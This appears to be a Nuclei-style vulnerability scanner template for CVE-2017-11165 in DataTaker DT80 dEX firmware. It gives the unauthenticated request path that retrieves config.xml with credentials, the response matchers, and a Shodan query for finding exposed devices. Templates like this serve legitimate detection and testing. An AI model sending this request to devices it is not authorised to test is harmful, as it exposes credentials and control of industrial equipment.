id: CVE-2017-11165 info: name: DataTaker DT80 dEX 1.50.012 - Information Disclosure author: theabhinavgaur severity: critical description: | DataTaker DT80 dEX 1.50.012 is susceptible to information disclosure. A remote attacker can obtain sensitive credential and configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI, thereby possibly accessing sensitive information, modifying data, and/or executing unauthorized operations. reference: - https://www.exploit-db.com/exploits/45094 - https://packetstormsecurity.com/files/143328/DataTaker-DT80-dEX-1.50.012-Sensitive-Configuration-Exposure.html - https://www.exploit-db.com/exploits/42313/ - https://nvd.nist.gov/vuln/detail/CVE-2017-11165 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-11165 cwe-id: CWE-200 epss-score: 0.94336 cpe: cpe:2.3:o:datataker:dt80_dex_firmware:1.50.012:*:*:*:*:*:*:* epss-percentile: 0.98871 metadata: max-request: 1 shodan-query: http.title:"datataker" verified: true vendor: datataker product: dt80_dex_firmware tags: lfr,edb,cve,cve2017,datataker,config,packetstorm,exposure http: - method: GET path: - "{{BaseURL}}/services/getFile.cmd?userfile=config.xml" matchers-condition: and matchers: - type: word words: - "COMMAND_SERVER" - "" - "config id=\"config" condition: and - type: word part: header words: - "text/xml" - type: status status: - 200